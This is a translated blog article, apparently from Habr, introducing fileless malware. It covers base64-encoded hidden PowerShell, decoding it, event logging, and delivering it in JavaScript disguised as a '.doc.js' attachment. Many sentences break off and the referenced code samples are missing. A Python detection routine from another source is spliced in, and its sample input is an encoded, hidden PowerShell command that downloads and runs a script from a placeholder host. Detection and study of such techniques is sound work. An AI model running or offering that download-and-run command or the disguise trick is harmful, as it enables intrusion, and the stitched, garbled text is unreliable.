With this article we begin a series of publications about elusive malware. Fileless hacking tools, also known as fileless malware, commonly use PowerShell on Windows systems to quietly run commands that search for and extract valuable information. Detecting hacker activity when there are no malicious files is a hard task, because antiviruses and other detection systems rely on signature analysis. But the good news is that such software does exist. For example,
When I started researching the topic of fileless hackers,
PowerShell the Great and Powerful
I wrote about some of these ideas earlier
Besides the samples themselves, on that site you can see what these programs actually do. Hybrid Analysis runs the malware inside its own sandbox and monitors system calls, running processes and network activity, and extracts suspicious text strings. For binaries and other executables, i.e. where you cannot look at the actual high-level code, Hybrid Analysis decides whether the software is malicious or suspicious based on its runtime behaviour. After that, the sample is rated.
In the case of PowerShell and other script samples (Visual Basic, JavaScript, etc.), I could see the code itself. For example, I came across this PowerShell sample:
You can run PowerShell with base64 encoding to avoid detection. Note the use of the NonInteractive and Hidden parameters.
If you have read my posts on obfuscation, then you know that the -e option indicates that what follows is base64-encoded content. By the way, Hybrid Analysis helps here too by decoding everything back. If you want to try decoding base64 PowerShell (hereafter PS) yourself, you need to run this command:
[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($EncodedText))
Going deeper
I decoded our PS script in this way; below is the text of the program, slightly modified by me:
Note that the script was tied to the date September 4, 2017 and that session cookies were sent.
I wrote about this type of attack in
What does it do?
For security software that watches Windows event logs or firewalls, base64 encoding keeps the "WebClient" string from being detected by a simple text pattern that would block that web request. And since all the "evil" of the malware is downloaded and passed into our PowerShell, this approach should let us evade detection entirely. Or so I thought at first.
It turns out that with Windows PowerShell advanced logging enabled (see my article), you can see the loaded line in the event log. I, like
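As an added example, not code from the original post, here is a small Python triage routine for the situation just described: it pulls the -EncodedCommand argument out of a logged process command line, decodes it the same way the one-liner above does (UTF-16LE under base64), and reports the strings ("WebClient" and friends) and quiet switches (NonInteractive, Hidden) that the post singles out. The sample command lines are constructed, and example.invalid is a placeholder host.

```python
import base64
import re

# Spellings of the encoded-command switch seen on command lines (PowerShell accepts -e, -ec, -enc, -EncodedCommand).
ENC_SWITCH = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
# Strings the post singles out as worth watching for once the script body is readable.
INDICATORS = ("WebClient", "DownloadString", "DownloadFile", "IEX", "Invoke-Expression", "Wscript.Shell")
# Switches that keep the console quiet and invisible to the user.
QUIET_SWITCHES = ("-NonInteractive", "-NoProfile", "-WindowStyle Hidden", "-w hidden")

def to_encoded_command(script):
    """UTF-16LE text, then base64: the -EncodedCommand form. Used here only to build the constructed sample input."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

def decode_encoded_command(cmdline):
    """Return the script carried by an -EncodedCommand switch, or None if there is none or it is malformed."""
    match = ENC_SWITCH.search(cmdline)
    if not match:
        return None
    try:
        raw = base64.b64decode(match.group(1), validate=True)
        return raw.decode("utf-16-le")  # same decoding as [Text.Encoding]::Unicode.GetString in the post
    except (ValueError, UnicodeDecodeError):
        return None

def analyze(cmdline):
    """Decode the command line if it is encoded and list the indicators and quiet switches it carries."""
    decoded = decode_encoded_command(cmdline)
    body = (decoded or "").lower()
    return {
        "encoded": decoded is not None,
        "decoded": decoded,
        "indicators": [s for s in INDICATORS if s.lower() in body],
        "quiet_switches": [s for s in QUIET_SWITCHES if s.lower() in cmdline.lower()],
    }

def is_suspicious(cmdline):
    """An encoded command whose body fetches from the network or evaluates text deserves a closer look."""
    result = analyze(cmdline)
    return result["encoded"] and bool(result["indicators"])

# Constructed sample "Process Command Line" values, modelled on what Windows process-creation events record.
SAMPLE_COMMAND_LINES = [
    "powershell.exe -NonInteractive -WindowStyle Hidden -e "
    + to_encoded_command("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/evil.ps1')"),
    "powershell.exe -NoProfile -EncodedCommand " + to_encoded_command("Get-Service | Where-Object Status -eq 'Running'"),
    "powershell.exe -Command Get-Date",
]
```

Run `analyze()` over each entry of SAMPLE_COMMAND_LINES: only the first one is encoded, hidden and carries the download indicators, while the second shows that encoding alone (an admin's Get-Service query) is not evidence of anything.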
Adding more samples
Hackers cleverly hide PowerShell attacks inside Microsoft Office macros written in Visual Basic and other scripting languages. The idea is that the victim receives an e-mail, for example from a delivery service, with an attached report in .doc format. You open this document containing the macro, and it ends up launching PowerShell itself.
The Visual Basic script is itself often obfuscated so that it simply slips past antivirus and other malware scanners. In that spirit, I decided to wrap the PowerShell above in JavaScript as an exercise. Below are the results of my work:
JavaScript has hidden our PowerShell. Real hackers do this once or twice.
This is another technique I have seen floating around the web: using Wscript.Shell to run the encoded PowerShell. By the way, JavaScript itself
In our case, the malicious JS script was delivered as a file with the extension .doc.js. Windows normally shows only the first suffix, so to the victim it looks like a Word document.
Only the scroll icon gives away that it is a JS file. It is no surprise that many people open such an attachment believing it to be a Word document.
In my example, I modified the PowerShell above to download the script from my website. The remote PS script merely prints "Evil Malware". As you can see, it is not evil at all. Of course, real hackers are interested in getting access to a computer or server, say, via a command shell. In the next article, I will show you how this is done using PowerShell Empire.
I think that for a first, introductory article we have not dived too deep into the topic. For now I will leave you, and next time we will start looking at real examples of attacks using fileless malware, without any introductory words or preparation.
Source: www.habr.com